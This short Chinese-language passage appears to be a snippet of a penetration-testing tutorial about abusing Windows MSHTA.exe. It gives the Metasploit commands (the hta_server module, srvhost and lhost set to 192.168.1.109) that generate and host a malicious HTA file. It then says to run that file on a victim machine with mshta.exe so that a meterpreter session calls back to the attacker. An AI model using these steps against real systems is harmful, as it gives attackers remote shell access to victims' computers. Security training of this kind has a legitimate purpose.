负责运行我们可以使用 JavaScript 或 VBScript 运行的 HTA(HTML 应用程序)文件的 Windows OS 实用程序。您可以使用 Microsoft MSHTA.exe 工具解释这些文件。Metasploit 包含“HTA Web 服务器”模块,该模块生成恶意 hta 文件。此模块托管一个 HTML 应用程序 (HTA),当打开时将通过 Powershell 运行有效负载。恶意 HTA 文件在 Kali linux 中打开 metasploit 并使用以下命令生成恶意 HTA 文件:use exploit/windows/misc/hta_server set srvhost 192.168.1.109 set lhost 192.168.1.109 exploit 现在通过受害者机器上的 mshta.exe 运行恶意代码以获取 meterpreter 会话。阅读更多